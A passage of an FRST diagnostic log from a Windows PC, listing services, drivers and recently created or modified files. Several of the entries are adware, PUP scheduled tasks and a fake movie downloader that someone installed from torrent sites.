S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
S2 ZAtheros Wlan Agent; C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe [81536 2012-07-31] (Atheros) [File not signed]
S2 Gejdiubx; "C:\Users\owner\AppData\Roaming\RujgAjueocf\Remdhuus.exe" -cms [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [76952 2012-08-10] (Qualcomm Atheros)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows (R) Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows (R) Win 7 DDK provider)
R0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
S3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-01-10] (Malwarebytes)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
S3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [37960 2015-12-02] (McAfee, Inc.)
R3 Ps2Kb2Hid; C:\Windows\System32\drivers\aPs2Kb2Hid.sys [26736 2012-10-09] (Dritek System Inc.)
S3 usbrndis6; C:\Windows\system32\DRIVERS\usb80236.sys [20992 2013-08-22] (Microsoft Corporation)
S3 voxaldriver; C:\Windows\system32\DRIVERS\voxaldriverx64.sys [34512 2015-10-26] ()
S3 vpnva; C:\Windows\system32\DRIVERS\vpnva64-6.sys [52592 2014-10-16] (Cisco Systems, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44024 2015-02-03] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [264000 2015-02-03] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)
S3 EagleX64; \??\C:\WINDOWS\system32\drivers\EagleX64.sys [X]
S1 swsedrvr_vw_1_10_0_25; system32\drivers\swsedrvr_vw_1_10_0_25.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-10 18:13 - 2016-01-10 19:21 - 00000000 ____D C:\FRST
2016-01-10 15:09 - 2016-01-10 15:09 - 00000000 ____D C:\Program Files\Task Service
2016-01-10 15:09 - 2016-01-10 15:09 - 00000000 ____D C:\Program Files\Scan Service
2016-01-10 15:07 - 2016-01-10 15:09 - 00140288 _____ (Microsoft) C:\WINDOWS\system32\MalwareScanner.exe
2016-01-10 15:07 - 2016-01-10 15:09 - 00071168 _____ (Microsoft) C:\WINDOWS\system32\WindowsLock.exe
2016-01-10 14:30 - 2016-01-10 15:21 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-01-10 14:30 - 2016-01-10 14:56 - 00001112 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-01-10 14:30 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-01-10 14:30 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-01-10 14:30 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-01-09 21:13 - 2016-01-10 16:13 - 00000000 ____D C:\Users\owner\AppData\Local\CrashDumps
2016-01-09 21:08 - 2016-01-10 14:56 - 00001422 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-01-09 21:00 - 2016-01-09 21:00 - 00019912 ____H C:\WINDOWS\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job
2016-01-09 21:00 - 2016-01-09 21:00 - 00000000 ____D C:\ProgramData\fc7235fa-41a3-1
2016-01-09 20:58 - 2016-01-09 20:58 - 00019720 ____H C:\WINDOWS\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job
2016-01-09 20:58 - 2016-01-09 20:58 - 00000000 ____D C:\ProgramData\ad8a10da-14d7-1
2016-01-09 20:57 - 2016-01-09 20:57 - 00000000 ____D C:\Program Files (x86)\ExploreTech
2016-01-09 20:11 - 2016-01-09 20:11 - 00000000 ____D C:\Program Files (x86)\predm
2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\Users\owner\AppData\Local\NPE
2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\ProgramData\Norton
2016-01-09 19:33 - 2016-01-10 19:30 - 00726406 _____ C:\WINDOWS\ntbtlog.txt
2016-01-09 19:24 - 2016-01-09 19:24 - 00003284 _____ C:\WINDOWS\System32\Tasks\psv_Temptough
2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (5).exe
2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (4).exe
2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (3).exe
2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (2).exe
2016-01-09 18:43 - 2016-01-09 18:43 - 00002782 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2016-01-09 18:42 - 2016-01-10 14:56 - 00000876 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\Program Files\CCleaner
2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513.exe
2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (1).exe
2016-01-09 18:16 - 2016-01-09 18:16 - 00003242 _____ C:\WINDOWS\System32\Tasks\IBUpd2
2016-01-09 18:15 - 2016-01-09 18:15 - 00022184 _____ (Corporation) C:\WINDOWS\system32\Drivers\sdfhgdf.sys
2016-01-09 18:15 - 2016-01-09 18:15 - 00003406 _____ C:\WINDOWS\System32\Tasks\RSPro
2016-01-09 18:14 - 2016-01-09 18:14 - 00000008 _____ C:\END
2016-01-09 18:09 - 2016-01-10 16:09 - 00000282 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
2016-01-09 18:09 - 2016-01-09 19:14 - 00000282 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
2016-01-09 18:09 - 2016-01-09 18:09 - 00023024 _____ C:\WINDOWS\System32\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}
2016-01-09 18:09 - 2016-01-09 18:09 - 00003568 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2016-01-09 18:09 - 2016-01-09 18:09 - 00003232 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
2016-01-09 18:09 - 2016-01-09 18:09 - 00002832 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
2016-01-09 18:09 - 2016-01-09 18:09 - 00002536 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-78e1-0
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-3443-1
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-2473-0
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-09a5-1
2016-01-09 18:00 - 2016-01-09 18:00 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
2016-01-09 17:22 - 2016-01-09 17:22 - 00003270 _____ C:\WINDOWS\System32\Tasks\psv_Tripplezap
2016-01-09 17:18 - 2016-01-09 17:18 - 00000015 _____ C:\WINDOWS\system32\config.conf
2016-01-09 17:18 - 2016-01-09 17:18 - 00000000 ____D C:\WINDOWS\system32\jurk
2016-01-09 17:10 - 2016-01-09 17:59 - 00000000 ____D C:\Users\owner\AppData\Local\DailyWiki
2016-01-09 17:08 - 2016-01-09 17:57 - 00003426 _____ C:\WINDOWS\System32\Tasks\Olunnuag
2016-01-09 16:42 - 2016-01-10 16:09 - 00000280 _____ C:\WINDOWS\Tasks\Goose.job
2016-01-09 16:42 - 2016-01-09 19:26 - 00004720 _____ C:\WINDOWS\SysWOW64\Kefzha.ini
2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\SysWOW64\KefzhaOff.ini
2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\system32\KefzhaOff.ini
2016-01-09 16:42 - 2016-01-09 16:42 - 00003336 _____ C:\WINDOWS\System32\Tasks\Foebyyc
2016-01-09 16:42 - 2016-01-09 16:42 - 00002474 _____ C:\WINDOWS\System32\Tasks\Goose
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\Company
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Tempfolder
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds365
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\uninst
2016-01-09 16:42 - 2016-01-09 15:28 - 00768376 _____ C:\WINDOWS\system32\Kefzha64.dll
2016-01-09 16:42 - 2016-01-09 15:28 - 00289144 _____ C:\WINDOWS\SysWOW64\Kefzha.dll
2016-01-09 16:40 - 2016-01-09 16:40 - 00004186 _____ C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Pending Update
2016-01-09 16:40 - 2016-01-09 16:40 - 00004176 _____ C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Core
2016-01-09 16:38 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Setup Support for Looksafe
2016-01-09 16:38 - 2016-01-09 16:38 - 00003690 _____ C:\WINDOWS\System32\Tasks\GTNU_635879831232953538
2016-01-09 16:38 - 2016-01-09 16:38 - 00003338 _____ C:\WINDOWS\System32\Tasks\GNU_635879831225933307
2016-01-09 16:36 - 2016-01-09 16:36 - 00004988 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010Main
2016-01-09 16:36 - 2016-01-09 16:36 - 00004956 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010P
2016-01-09 16:36 - 2016-01-09 16:36 - 00004944 _____ C:\WINDOWS\System32\Tasks\DfGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837
2016-01-09 16:36 - 2016-01-09 16:36 - 00004932 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4287834998-254447837-4126873412-1000Main
2016-01-09 16:36 - 2016-01-09 16:36 - 00004930 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010
2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminS-1-5-21-4287834998-254447837-4126873412-1010
2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\AdGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010D
2016-01-09 16:36 - 2016-01-09 16:36 - 00004906 _____ C:\WINDOWS\System32\Tasks\ZcGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412
2016-01-09 16:36 - 2016-01-09 16:36 - 00003258 _____ C:\WINDOWS\System32\Tasks\Easy Driver Pro Schedule
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\WINDOWS\system32\Express
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Server
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Host
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Svc Host
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\IIS
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Explore
2016-01-09 16:34 - 2016-01-09 16:34 - 00003828 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1452386042
2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Roaming\Opera Software
2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Local\Opera Software
2016-01-09 16:33 - 2016-01-10 16:09 - 00000352 ____H C:\WINDOWS\Tasks\UXJOVQQVBISGUWLJ.job
2016-01-09 16:33 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Opera
2016-01-09 16:33 - 2016-01-09 20:15 - 00000000 ____D C:\Program Files\Sound+
2016-01-09 16:33 - 2016-01-09 16:33 - 00003360 _____ C:\WINDOWS\System32\Tasks\UXJOVQQVBISGUWLJ
2016-01-09 16:33 - 2016-01-09 16:33 - 00002854 _____ C:\WINDOWS\System32\Tasks\LSNHDG1
2016-01-09 16:33 - 2016-01-09 16:33 - 00000000 ____D C:\ProgramData\28341ff220e0446c9fff27c4493d622e
2016-01-09 16:32 - 2016-01-09 21:00 - 00000000 ____D C:\Program Files (x86)\Probit Software
2016-01-09 16:32 - 2016-01-09 16:32 - 00041472 _____ C:\Users\owner\AppData\Local\Donelectronics.dat
2016-01-09 16:32 - 2016-01-09 16:32 - 00028160 _____ C:\Users\owner\AppData\Local\Donelectronics.exe
2016-01-09 16:32 - 2016-01-09 16:32 - 00000187 _____ C:\Users\owner\AppData\Local\Donelectronics.exe.config
2016-01-09 16:32 - 2016-01-09 16:32 - 00000000 ____D C:\Program Files\cmdidx
2016-01-09 16:31 - 2016-01-10 16:08 - 00000000 ____D C:\ProgramData\ApplicationHosting
2016-01-09 16:31 - 2016-01-09 16:31 - 05142944 _____ (hxxp://spring-files.com) C:\Users\owner\Downloads\Into_the_Wild_2007_1080p_BrRip_x264_-_YIFY_downloader.exe
2016-01-09 16:31 - 2016-01-09 16:31 - 00004144 _____ C:\WINDOWS\System32\Tasks\WebDnsio2-daily
2016-01-09 16:31 - 2016-01-09 16:29 - 00000967 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
2016-01-09 16:30 - 2016-01-09 16:31 - 00000000 ____D C:\Program Files (x86)\WebDnsio
2016-01-09 16:30 - 2016-01-09 16:30 - 00005164 _____ C:\WINDOWS\System32\Tasks\WebDnsio2
2016-01-09 16:29 - 2016-01-09 16:29 - 01017652 _____ C:\Users\owner\Downloads\Into The Wild 2007 1080p BrR Downloader.rar
2016-01-09 16:29 - 2016-01-09 16:29 - 00000000 ___HD C:\Program Files\AmazingTab
2016-01-09 16:29 - 2016-01-09 16:29 - 00000000 ____D C:\Program Files\amztab
2016-01-09 16:27 - 2016-01-09 16:30 - 00000022 _____ C:\Users\owner\Downloads\into.the.wild.2007.1080p..zip-.zip
2016-01-09 15:59 - 2016-01-09 15:59 - 00033072 _____ C:\Users\owner\Downloads\Deliver Us from Evil 2014.torrent
2016-01-09 15:40 - 2016-01-09 15:40 - 00019657 _____ C:\Users\owner\Downloads\[kat.cr]devil.s.knot.2013.1080p.brrip.x264.yify.torrent
2016-01-09 15:22 - 2016-01-09 15:22 - 00013243 _____ C:\Users\owner\Downloads\[kat.cr]enemy.2013.1080p.x264.dd5.1.en.nl.subs.asian.torrenz.torrent
2016-01-09 14:59 - 2016-01-09 14:59 - 00019431 _____ C:\Users\owner\Downloads\[kat.cr]leviathan.2014.1080p.brrip.x264.ac3.jyk.torrent
2016-01-09 14:38 - 2016-01-09 14:38 - 00118580 _____ C:\Users\owner\Downloads\[kat.cr]meru.2015.brrip.xvid.ac3.evo.torrent
2016-01-09 14:18 - 2016-01-09 14:18 - 00087738 _____ C:\Users\owner\Downloads\[kat.cr]selma.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
2016-01-09 13:44 - 2016-01-09 13:44 - 00019546 _____ C:\Users\owner\Downloads\[kat.cr]dilwale.2015.desiscr.950mb.torrent
2016-01-09 13:29 - 2016-01-09 13:29 - 00028395 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2.hdrip.torrent
2016-01-09 13:16 - 2016-01-09 13:16 - 00192082 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2012.bdrip.xvid.eng.ita.ac3.torrent
2016-01-09 12:46 - 2016-01-09 12:46 - 00067266 _____ C:\Users\owner\Downloads\[kat.cr]straight.outta.compton.2015.dc.1080p.bluray.h264.aac.rarbg.torrent
2016-01-09 12:19 - 2016-01-09 12:19 - 00140864 _____ C:\Users\owner\Downloads\[kat.cr]whiplash.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
2016-01-09 12:08 - 2016-01-09 12:08 - 00017330 _____ C:\Users\owner\Downloads\[kat.cr]chef.2014.2ndtimearound.torrent
2016-01-09 12:07 - 2016-01-09 12:07 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (2).torrent
2016-01-09 12:06 - 2016-01-09 12:06 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (1).torrent
2016-01-09 12:05 - 2016-01-09 12:05 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw.torrent
2016-01-09 11:50 - 2016-01-09 11:50 - 00019667 _____ C:\Users\owner\Downloads\[kat.cr]nightcrawler.2014.1080p.brrip.x264.yify.torrent
2016-01-09 11:30 - 2016-01-09 11:30 - 00014728 _____ C:\Users\owner\Downloads\[kat.cr]diablo.2016.hdrip.xvid.ac3.evo.torrent
2016-01-09 10:55 - 2016-01-09 10:55 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu (1).torrent
2016-01-09 10:54 - 2016-01-09 10:54 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu.torrent
2016-01-09 10:45 - 2016-01-09 10:45 - 00031210 _____ C:\Users\owner\Downloads\[kat.cr]the.little.prince.2015.bluray.1080p.dts.hd.ma.5.1.x264.mteam.mkv.torrent
2016-01-09 10:21 - 2016-01-09 10:21 - 00010218 _____ C:\Users\owner\Downloads\[kat.cr]mad.max.fury.road.2015.720p.brrip.x264.yify.torrent
2016-01-09 10:12 - 2016-01-09 10:12 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg (1).torrent
2016-01-09 10:10 - 2016-01-09 10:10 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg.torrent
2016-01-09 09:54 - 2016-01-09 09:54 - 00019417 _____ C:\Users\owner\Downloads\[kat.cr]san.andreas.2015.1080p.brrip.x264.yify.torrent
2016-01-09 09:38 - 2016-01-09 09:38 - 00106326 _____ C:\Users\owner\Downloads\[kat.cr]the.sponge.bob.movie.sponge.out.of.water.2015.cam.xvid.vain.torrent
2016-01-09 09:32 - 2016-01-09 09:32 - 00022617 _____ C:\Users\owner\Downloads\[kat.cr]divergent.2014.1080p.bluray.x264.ac3.dd5.1.inam.torrent
2016-01-09 09:12 - 2016-01-09 09:12 - 00120298 _____ C:\Users\owner\Downloads\[kat.cr]spy.2015.hc.hdrip.xvid.ac3.evo.torrent
2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (2).tif
2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (1).tif
2016-01-08 11:43 - 2016-01-08 11:43 - 14655654 _____ C:\Users\owner\Downloads\scan4.tif
2016-01-07 07:28 - 2016-01-10 16:10 - 00000000 ____D C:\Users\owner\AppData\LocalLow\uTorrent
2016-01-04 17:09 - 2016-01-08 20:25 - 00000000 ____D C:\Users\owner\AppData\Roaming\OBS
2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files\OBS
2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files (x86)\OBS
2016-01-04 17:04 - 2016-01-04 17:06 - 68037144 _____ C:\Users\owner\Downloads\OBS_0_657b_With_Browser_Installer.exe
2016-01-03 21:42 - 2016-01-10 14:56 - 00001619 _____ C:\Users\Public\Desktop\League of Legends.lnk
2016-01-03 21:42 - 2016-01-03 21:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\League of Legends
2016-01-03 21:42 - 2008-07-12 08:18 - 03851784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DX9_39.dll
2016-01-03 21:42 - 2008-07-12 08:18 - 01493528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_39.dll
2016-01-03 21:42 - 2008-07-12 08:18 - 00467984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10_39.dll
2016-01-03 21:23 - 2016-01-03 21:42 - 00000000 __SHD C:\AI_RecycleBin
2015-12-31 09:58 - 2016-01-08 11:45 - 00076288 ___SH C:\Users\owner\Downloads\Thumbs.db
2015-12-28 17:04 - 2015-12-28 17:04 - 09479872 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe
2015-12-28 10:18 - 2015-12-28 10:18 - 00000000 ____D C:\Users\owner\AppData\Roaming\Gyazo
2015-12-28 10:16 - 2015-12-29 08:17 - 00000000 ____D C:\Program Files (x86)\Gyazo
2015-12-28 10:16 - 2015-12-28 10:16 - 09986504 _____ (Nota Inc. ) C:\Users\owner\Downloads\Gyazo-3.1.6.exe
2015-12-28 10:16 - 2015-12-28 10:16 - 00003400 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachineDaily
2015-12-28 10:16 - 2015-12-28 10:16 - 00003274 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachine
2015-12-28 10:16 - 2015-12-28 10:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gyazo
2015-12-27 17:52 - 2015-12-27 17:52 - 00000000 ____D C:\Users\owner\AppData\Local\Hewlett-Packard
2015-12-27 17:28 - 2015-12-27 17:28 - 00000000 ____D C:\Users\owner\AppData\Roaming\Hewlett-Packard
2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\System.sav
2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2015-12-27 17:21 - 2015-12-27 17:21 - 00000000 ____D C:\Users\owner\AppData\Roaming\hpqLog
2015-12-27 17:05 - 2015-12-27 17:05 - 00000000 ____D C:\WINDOWS\System32\Tasks\Hewlett-Packard
2015-12-27 17:04 - 2015-12-27 17:22 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2015-12-27 17:02 - 2015-12-27 17:02 - 03795680 _____ (Oleg N. Scherbakov) C:\Users\owner\Downloads\HPSupportSolutionsFramework-12.0.30.219.exe
2015-12-21 23:27 - 2016-01-10 14:56 - 00002707 _____ C:\Users\Public\Desktop\Skype.lnk
2015-12-21 23:27 - 2015-12-21 23:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda Softworks
2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\Program Files (x86)\Bethesda Softworks
2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Users\owner\AppData\Local\PAYDAY 2
2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\AGEIA Technologies
2015-12-13 15:06 - 2016-01-10 14:56 - 00001188 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Express Zip File Compression.lnk
2015-12-13 15:06 - 2015-12-13 15:06 - 00374903 _____ C:\Users\owner\Downloads\Athenas *** MH4G 0.81b.rar
2015-12-11 09:48 - 2016-01-09 18:47 - 00000000 ____D C:\WINDOWS\Minidump
 
==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-10 18:13 - 2013-08-22 05:36 - 00000000 ____D C:\Windows
2016-01-10 18:06 - 2014-11-21 00:44 - 00863592 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-01-10 18:06 - 2013-08-22 05:36 - 00000000 ____D C:\WINDOWS\Inf
2016-01-10 16:15 - 2015-04-08 11:24 - 00000000 ____D C:\Users\owner\AppData\Roaming\uTorrent
2016-01-10 16:15 - 2015-04-08 11:23 - 00000000 ____D C:\Users\owner\AppData\Roaming\Spotify
2016-01-10 16:15 - 2015-04-02 18:05 - 00000000 ____D C:\Program Files (x86)\Steam
2016-01-10 16:15 - 2013-08-22 06:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-01-10 16:14 - 2015-01-20 17:04 - 00003594 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3773202632-424774445-890114178-1001
2016-01-10 16:10 - 2015-04-08 11:25 - 00000000 ____D C:\Users\owner\AppData\Local\Spotify
2016-01-10 16:10 - 2015-03-31 11:26 - 00000000 ___RD C:\Users\owner\OneDrive
2016-01-10 16:09 - 2015-03-30 19:02 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-10 16:09 - 2015-03-30 19:02 - 00000912 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-10 15:04 - 2015-09-16 07:26 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-01-10 14:56 - 2015-11-24 22:00 - 00001122 _____ C:\Users\Public\Desktop\OpenOffice 4.1.2.lnk
2016-01-10 14:56 - 2015-10-26 15:43 - 00001112 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Voxal Voice Changer.lnk
2016-01-10 14:56 - 2015-04-16 18:45 - 00002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-01-10 14:56 - 2015-04-16 18:28 - 00001163 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-01-10 14:56 - 2015-04-08 11:26 - 00000877 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
2016-01-10 14:56 - 2015-03-30 20:52 - 00002523 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-01-10 14:56 - 2015-01-22 22:29 - 00001511 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-01-10 14:56 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\System
2016-01-10 14:56 - 2012-10-09 15:00 - 00002423 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office.lnk
2016-01-10 14:56 - 2012-10-09 14:53 - 00001923 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spotify.lnk
2016-01-10 14:56 - 2012-09-03 08:23 - 00001673 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer User's Manual.lnk
2016-01-10 14:56 - 2012-09-03 08:23 - 00001655 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer Quick Guide.lnk
2016-01-10 14:56 - 2012-09-03 08:10 - 00002572 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - acer.lnk
2016-01-10 14:55 - 2015-04-21 16:09 - 00000000 ____D C:\Program Files (x86)\SearchProtect
2016-01-10 13:29 - 2013-08-22 05:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-01-09 21:28 - 2015-03-12 16:27 - 00000000 ____D C:\Users\owner\AppData\Local\Deployment
